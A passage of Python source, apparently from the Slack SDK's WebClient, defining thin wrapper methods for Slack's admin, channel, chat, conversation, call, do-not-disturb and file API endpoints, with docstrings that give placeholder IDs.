team_id is required if your Enterprise Grid org contains more than one workspace.
Args:
invite_request_id (str): ID of the request to invite. e.g. 'Ir1234'
"""
kwargs.update({"invite_request_id": invite_request_id})
return self.api_call("admin.inviteRequests.approve", json=kwargs)
def admin_inviteRequests_approved_list(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all approved workspace invite requests."""
return self.api_call("admin.inviteRequests.approved.list", params=kwargs)
def admin_inviteRequests_denied_list(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all denied workspace invite requests."""
return self.api_call("admin.inviteRequests.denied.list", params=kwargs)
def admin_inviteRequests_deny(
self, *, invite_request_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deny a workspace invite request.
Args:
invite_request_id (str): ID of the request to invite. e.g. 'Ir1234'
"""
kwargs.update({"invite_request_id": invite_request_id})
return self.api_call("admin.inviteRequests.deny", json=kwargs)
def admin_inviteRequests_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List all pending workspace invite requests."""
return self.api_call("admin.inviteRequests.list", params=kwargs)
def admin_teams_admins_list(
self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all of the admins on a given workspace.
Args:
team_id (str): ID of the team.
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.teams.admins.list", http_verb="GET", params=kwargs)
def admin_teams_create(
self, *, team_domain: str, team_name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Create an Enterprise team.
Args:
team_domain (str): Team domain. e.g. 'slacksoftballteam'
team_name (str): Team name. e.g. 'Slack Softball Team'
"""
kwargs.update({"team_domain": team_domain, "team_name": team_name})
return self.api_call("admin.teams.create", json=kwargs)
def admin_teams_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List all teams on an Enterprise organization."""
return self.api_call("admin.teams.list", params=kwargs)
def admin_teams_owners_list(
    self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """List all of the owners on a given workspace.

    Args:
        team_id (str): ID of the team.
    """
    kwargs.update({"team_id": team_id})
    return self.api_call("admin.teams.owners.list", http_verb="GET", params=kwargs)
def admin_teams_settings_info(
self, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetch information about settings in a workspace
Args:
team_id (str): ID of the team.
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.teams.settings.info", json=kwargs)
def admin_teams_settings_setDescription(
self, *, team_id: str, description: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set the description of a given workspace.
Args:
team_id (str): ID of the team.
description (str): Description of the team.
"""
kwargs.update({"team_id": team_id, "description": description})
return self.api_call("admin.teams.settings.setDescription", json=kwargs)
def admin_teams_settings_setDiscoverability(
    self, *, team_id: str, discoverability: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Set the discoverability of a given workspace.

    Args:
        team_id (str): ID of the team.
        discoverability (str): This workspace's discovery setting.
            It must be set to one of open, invite_only, closed, or unlisted.
    """
    kwargs.update({"team_id": team_id, "discoverability": discoverability})
    return self.api_call("admin.teams.settings.setDiscoverability", json=kwargs)
def admin_teams_settings_setIcon(
self, *, team_id: str, image_url: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the icon of a workspace.
Args:
team_id (str): ID of the team.
image_url (str): Url of the icon.
"""
kwargs.update({"team_id": team_id, "image_url": image_url})
return self.api_call(
"admin.teams.settings.setIcon", http_verb="GET", params=kwargs
)
def admin_teams_settings_setName(
    self, *, team_id: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Set the name of a given workspace.

    Args:
        team_id (str): ID of the team.
        name (str): Name of the team.
    """
    kwargs.update({"team_id": team_id, "name": name})
    return self.api_call("admin.teams.settings.setName", json=kwargs)
def admin_usergroups_addChannels(
self,
*,
team_id: str,
usergroup_id: str,
channel_ids: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Add one or more default channels to an IDP group.
Args:
team_id (str): The workspace to add default channels in. e.g. 'T1234'
usergroup_id (str): ID of the IDP group to add default channels for. e.g. 'S1234'
channel_ids (str or list): Comma separated string of channel IDs. e.g. 'C123,C234' or ['C123', 'C234']
"""
kwargs.update({"team_id": team_id, "usergroup_id": usergroup_id})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call("admin.usergroups.addChannels", params=kwargs)
def admin_usergroups_addTeams(
self, *, usergroup_id: str, team_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Associate one or more default workspaces with an organization-wide IDP group.
Args:
usergroup_id (str): ID of the IDP group. e.g. 'S1234'
team_ids (str or list): A comma separated list of encoded team (workspace) IDs.
Each workspace MUST belong to the organization associated with the token.
e.g. 'T12345678,T98765432' or ['T12345678', 'T98765432']
"""
kwargs.update({"usergroup_id": usergroup_id})
if isinstance(team_ids, (list, Tuple)):
kwargs.update({"team_ids": ",".join(team_ids)})
else:
kwargs.update({"team_ids": team_ids})
return self.api_call("admin.usergroups.addTeams", params=kwargs)
def admin_usergroups_listChannels(
    self, *, usergroup_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """List the default channels linked to an org-level IDP group.

    Args:
        usergroup_id (str): ID of the IDP group to list default channels for. e.g. 'S1234'
    """
    kwargs.update({"usergroup_id": usergroup_id})
    return self.api_call("admin.usergroups.listChannels", json=kwargs)
def admin_usergroups_removeChannels(
    self, *, usergroup_id: str, channel_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
    """Remove one or more default channels from an org-level IDP group.

    Args:
        usergroup_id (str): ID of the IDP group. e.g. 'S1234'
        channel_ids (str or list): Comma separated string of channel IDs. e.g. 'C123,C234' or ['C123', 'C234']
    """
    kwargs.update({"usergroup_id": usergroup_id})
    # A sequence of ids is collapsed into the comma-separated form the API expects.
    if isinstance(channel_ids, (list, Tuple)):
        kwargs.update({"channel_ids": ",".join(channel_ids)})
    else:
        kwargs.update({"channel_ids": channel_ids})
    return self.api_call("admin.usergroups.removeChannels", params=kwargs)
def admin_users_assign(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Add an Enterprise user to a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): ID of the user to add to the workspace.
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.assign", json=kwargs)
def admin_users_invite(
self,
*,
team_id: str,
email: str,
channel_ids: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Invite a user to a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
email (str): The email address of the person to invite. e.g. 'joe@email.com'
channel_ids (str or list): A list of channel_ids for this user to join.
At least one channel is required. e.g. ['C1A2B3C4D', 'C26Z25Y24']
"""
kwargs.update({"team_id": team_id, "email": email})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call("admin.users.invite", params=kwargs)
def admin_users_list(
self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List users on a workspace
Args:
team_id (str): ID of the team. e.g. 'T1234'
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.users.list", params=kwargs)
def admin_users_remove(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Remove a user from a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.remove", json=kwargs)
def admin_users_setAdmin(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest, regular user, or owner to be an admin user.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setAdmin", json=kwargs)
def admin_users_setExpiration(
self, *, expiration_ts: int, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an expiration for a guest user.
Args:
expiration_ts (int): Timestamp when guest account should be disabled. e.g. '1234567890'
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to set an expiration for. e.g. 'W12345678'
"""
kwargs.update(
{"expiration_ts": expiration_ts, "team_id": team_id, "user_id": user_id}
)
return self.api_call("admin.users.setExpiration", json=kwargs)
def admin_users_setOwner(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest, regular user, or admin user to be a workspace owner.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setOwner", json=kwargs)
def admin_users_setRegular(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest user, admin user, or owner to be a regular user.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setRegular", json=kwargs)
def api_test(self, **kwargs) -> Union[Future, SlackResponse]:
    """Checks API calling code.

    All keyword arguments are forwarded as the JSON body of the request.
    """
    return self.api_call("api.test", json=kwargs)
def apps_connections_open(
self, *, app_token: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Get a new WSS URL for Socket Mode"""
kwargs.update({"token": app_token})
return self.api_call("apps.connections.open", http_verb="POST", params=kwargs)
def apps_event_authorizations_list(
self, event_context: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Get a list of authorizations for the given event context.
Each authorization represents an app installation that the event is visible to.
Args:
event_context (str): You'll receive an event_context identifying an event in each event payload sent to your app.
"""
kwargs.update({"event_context": event_context})
return self.api_call("apps.event.authorizations.list", params=kwargs)
def apps_uninstall(
self, client_id: str, client_secret: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Uninstalls your app from a workspace.
Args:
client_id (str): Issued when you created your application. e.g. '56579136444.26251006572'
client_secret (str): Issued when you created your application. e.g. 'f25b5ceaf8a3c2a2c4f52bb4f0b0499e'
"""
kwargs.update({"client_id": client_id, "client_secret": client_secret})
return self.api_call("apps.uninstall", params=kwargs)
def auth_revoke(self, **kwargs) -> Union[Future, SlackResponse]:
    """Revokes a token.

    Keyword arguments are sent as query parameters on a GET request.
    """
    return self.api_call("auth.revoke", http_verb="GET", params=kwargs)
def auth_test(self, **kwargs) -> Union[Future, SlackResponse]:
    """Checks authentication & identity.

    All keyword arguments are forwarded as the JSON body of the request.
    """
    return self.api_call("auth.test", json=kwargs)
def bots_info(self, **kwargs) -> Union[Future, SlackResponse]:
    """Gets information about a bot user.

    Keyword arguments are sent as query parameters on a GET request.
    """
    return self.api_call("bots.info", http_verb="GET", params=kwargs)
def calls_add(
self, *, external_unique_id: str, join_url: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Registers a new Call.
Args:
external_unique_id (str): An ID supplied by the 3rd-party Call provider.
It must be unique across all Calls from that service.
e.g. '025169F6-E37A-4E62-BB54-7F93A0FC4C1F'
join_url (str): The URL required for a client to join the Call.
e.g. 'https://example.com/calls/1234567890'
"""
kwargs.update({"external_unique_id": external_unique_id, "join_url": join_url})
_update_call_participants( # skipcq: PTC-W0039
kwargs, kwargs.get("users", None) # skipcq: PTC-W0039
) # skipcq: PTC-W0039
return self.api_call("calls.add", http_verb="POST", params=kwargs)
def calls_end(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Ends a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.end", http_verb="POST", params=kwargs)
def calls_info(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Returns information about a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.info", http_verb="POST", params=kwargs)
def calls_participants_add(
self,
*,
id: str, # skipcq: PYL-W0622
users: Union[str, Sequence[Dict[str, str]]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Registers new participants added to a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
users: (list): The list of users to add as participants in the Call.
"""
kwargs.update({"id": id})
_update_call_participants(kwargs, users)
return self.api_call("calls.participants.add", http_verb="POST", params=kwargs)
def calls_participants_remove(
self,
*,
id: str, # skipcq: PYL-W0622
users: Union[str, Sequence[Dict[str, str]]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Registers participants removed from a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
users: (list): The list of users to remove as participants in the Call.
"""
kwargs.update({"id": id})
_update_call_participants(kwargs, users)
return self.api_call(
"calls.participants.remove", http_verb="POST", params=kwargs
)
def calls_update(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Updates information about a Call.
Args:
id (str): id returned by the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.update", http_verb="POST", params=kwargs)
def channels_archive(
    self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Archives a channel.

    Args:
        channel (str): The channel id. e.g. 'C1234567890'
    """
    # Merge the required id into the extra arguments and send as the JSON body.
    payload = dict(kwargs, channel=channel)
    return self.api_call("channels.archive", json=payload)
def channels_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
    """Creates a channel.

    Args:
        name (str): The name of the channel. e.g. 'mychannel'
    """
    # Merge the required name into the extra arguments and send as the JSON body.
    payload = dict(kwargs, name=name)
    return self.api_call("channels.create", json=payload)
def channels_history(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.history", http_verb="GET", params=kwargs)
def channels_info(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.info", http_verb="GET", params=kwargs)
def channels_invite(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invites a user to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("channels.invite", json=kwargs)
def channels_join(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Joins a channel, creating it if needed.
Args:
name (str): The channel name. e.g. '#general'
"""
kwargs.update({"name": name})
return self.api_call("channels.join", json=kwargs)
def channels_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("channels.kick", json=kwargs)
def channels_leave(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Leaves a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.leave", json=kwargs)
def channels_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all channels in a Slack team."""
return self.api_call("channels.list", http_verb="GET", params=kwargs)
def channels_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("channels.mark", json=kwargs)
def channels_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("channels.rename", json=kwargs)
def channels_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a channel
Args:
channel (str): The channel id. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("channels.replies", http_verb="GET", params=kwargs)
def channels_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("channels.setPurpose", json=kwargs)
def channels_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("channels.setTopic", json=kwargs)
def channels_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchives a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.unarchive", json=kwargs)
def chat_delete(
    self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Deletes a message.

    Args:
        channel (str): Channel containing the message to be deleted. e.g. 'C1234567890'
        ts (str): Timestamp of the message to be deleted. e.g. '1234567890.123456'
    """
    # Build the JSON payload from the extras plus the two required fields.
    payload = dict(kwargs, channel=channel, ts=ts)
    return self.api_call("chat.delete", json=payload)
def chat_deleteScheduledMessage(
self, *, channel: str, scheduled_message_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deletes a scheduled message.
Args:
channel (str): The channel the scheduled_message is posting to. e.g. 'C1234567890'
scheduled_message_id (str): scheduled_message_id returned from call to chat.scheduleMessage e.g. 'Q1234ABCD'
"""
kwargs.update(
{"channel": channel, "scheduled_message_id": scheduled_message_id}
)
return self.api_call("chat.deleteScheduledMessage", json=kwargs)
def chat_getPermalink(
self, *, channel: str, message_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a permalink URL for a specific extant message
Args:
channel (str): The channel id. e.g. 'C1234567890'
message_ts (str): The timestamp. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "message_ts": message_ts})
return self.api_call("chat.getPermalink", http_verb="GET", params=kwargs)
def chat_meMessage(
self, *, channel: str, text: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Share a me message into a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
text (str): The message you'd like to share. e.g. 'Hello world'
"""
kwargs.update({"channel": channel, "text": text})
return self.api_call("chat.meMessage", json=kwargs)
def chat_postEphemeral(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sends an ephemeral message to a user in a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The id of user who should see the message. e.g. 'U0BPQUNTA'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel, "user": user})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.postEphemeral", kwargs)
return self.api_call("chat.postEphemeral", json=kwargs)
def chat_postMessage(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sends a message to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.postMessage", kwargs)
return self.api_call("chat.postMessage", json=kwargs)
def chat_scheduleMessage(
self, *, channel: str, post_at: str, text: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Schedules a message.
Args:
channel (str): The channel the scheduled_message is posting to. e.g. 'C1234567890'
post_at (str): Unix EPOCH timestamp of time in future to send the message. e.g. '299876400'
text (str): The message you'd like to send. e.g. 'Hello world'
"""
kwargs.update({"channel": channel, "post_at": post_at, "text": text})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.scheduleMessage", kwargs)
return self.api_call("chat.scheduleMessage", json=kwargs)
def chat_unfurl(
self, *, channel: str, ts: str, unfurls: dict, **kwargs
) -> Union[Future, SlackResponse]:
"""Provide custom unfurl behavior for user-posted URLs.
Args:
channel (str): The Channel ID of the message. e.g. 'C1234567890'
ts (str): Timestamp of the message to add unfurl behavior to. e.g. '1234567890.123456'
unfurls (dict): a dict of the specific URLs you're offering an unfurl for.
e.g. {"https://example.com/": {"text": "Every day is the test."}}
"""
kwargs.update({"channel": channel, "ts": ts, "unfurls": unfurls})
return self.api_call("chat.unfurl", json=kwargs)
def chat_update(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Updates a message in a channel.
Args:
channel (str): The channel containing the message to be updated. e.g. 'C1234567890'
ts (str): Timestamp of the message to be updated. e.g. '1234567890.123456'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel, "ts": ts})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.update", kwargs)
return self.api_call("chat.update", json=kwargs)
def chat_scheduledMessages_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all scheduled messages."""
return self.api_call("chat.scheduledMessages.list", params=kwargs)
def conversations_archive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Archives a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.archive", json=kwargs)
def conversations_close(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Closes a direct message or multi-person direct message.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.close", json=kwargs)
def conversations_create(
self, *, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Initiates a public or private channel-based conversation
Args:
name (str): The name of the channel. e.g. 'mychannel'
"""
kwargs.update({"name": name})
return self.api_call("conversations.create", json=kwargs)
def conversations_history(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetches a conversation's history of messages and events.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.history", http_verb="GET", params=kwargs)
def conversations_info(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve information about a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.info", http_verb="GET", params=kwargs)
def conversations_invite(
self, *, channel: str, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Invites users to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
users (str or list): An list of user id's to invite. e.g. ['U2345678901', 'U3456789012']
"""
kwargs.update({"channel": channel})
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("conversations.invite", params=kwargs)
def conversations_join(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Joins an existing conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.join", json=kwargs)
def conversations_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The id of the user to kick. e.g. 'U2345678901'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("conversations.kick", json=kwargs)
def conversations_leave(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Leaves a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.leave", json=kwargs)
def conversations_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all channels in a Slack team."""
return self.api_call("conversations.list", http_verb="GET", params=kwargs)
def conversations_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a channel.
Args:
channel (str): Channel or conversation to set the read cursor for e.g. 'C1234567890'
ts (str): Unique identifier of message to mark as most recently seen in the convo e.g. '1593473566.000200'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("conversations.mark", json=kwargs)
def conversations_members(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve members of a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.members", http_verb="GET", params=kwargs)
def conversations_open(self, **kwargs) -> Union[Future, SlackResponse]:
"""Opens or resumes a direct message or multi-person direct message."""
return self.api_call("conversations.open", json=kwargs)
def conversations_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("conversations.rename", json=kwargs)
def conversations_replies(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a conversation
Args:
channel (str): Conversation ID to fetch thread from. e.g. 'C1234567890'
ts (str): Unique identifier of a thread's parent message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("conversations.replies", http_verb="GET", params=kwargs)
def conversations_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("conversations.setPurpose", json=kwargs)
def conversations_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("conversations.setTopic", json=kwargs)
def conversations_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Reverses conversation archival.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.unarchive", json=kwargs)
def dialog_open(
self, *, dialog: dict, trigger_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Open a dialog with a user.
Args:
dialog (dict): A dictionary of dialog arguments.
{
"callback_id": "46eh782b0",
"title": "Request something",
"submit_label": "Request",
"state": "Max",
"elements": [
{
"type": "text",
"label": "Origin",
"name": "loc_origin"
},
{
"type": "text",
"label": "Destination",
"name": "loc_destination"
}
]
}
trigger_id (str): The trigger id of a recent message interaction.
e.g. '12345.98765.abcd2358fdea'
"""
kwargs.update({"dialog": dialog, "trigger_id": trigger_id})
return self.api_call("dialog.open", json=kwargs)
def dnd_endDnd(self, **kwargs) -> Union[Future, SlackResponse]:
"""Ends the current user's Do Not Disturb session immediately."""
return self.api_call("dnd.endDnd", json=kwargs)
def dnd_endSnooze(self, **kwargs) -> Union[Future, SlackResponse]:
"""Ends the current user's snooze mode immediately."""
return self.api_call("dnd.endSnooze", json=kwargs)
def dnd_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieves a user's current Do Not Disturb status."""
return self.api_call("dnd.info", http_verb="GET", params=kwargs)
def dnd_setSnooze(
self, *, num_minutes: int, **kwargs
) -> Union[Future, SlackResponse]:
"""Turns on Do Not Disturb mode for the current user, or changes its duration.
Args:
num_minutes (int): The snooze duration. e.g. 60
"""
kwargs.update({"num_minutes": num_minutes})
return self.api_call("dnd.setSnooze", http_verb="GET", params=kwargs)
def dnd_teamInfo(
self, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieves the Do Not Disturb status for users on a team.
Args:
users (str or list): User IDs to fetch information e.g. 'U123,U234' or ["U123", "U234"]
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("dnd.teamInfo", http_verb="GET", params=kwargs)
def emoji_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists custom emoji for a team."""
return self.api_call("emoji.list", http_verb="GET", params=kwargs)
def files_comments_delete(
self, *, file: str, id: str, **kwargs # skipcq: PYL-W0622
) -> Union[Future, SlackResponse]:
"""Deletes an existing comment on a file.
Args:
file (str): The file id. e.g. 'F1234467890'
id (str): The file comment id. e.g. 'Fc1234567890'
"""
kwargs.update({"file": file, "id": id})
return self.api_call("files.comments.delete", json=kwargs)
def files_delete(self, *, file: str, **kwargs) -> Union[Future, SlackResponse]:
"""Deletes a file.
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.delete", json=kwargs)
def files_info(self, *, file: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a team file.
Args:
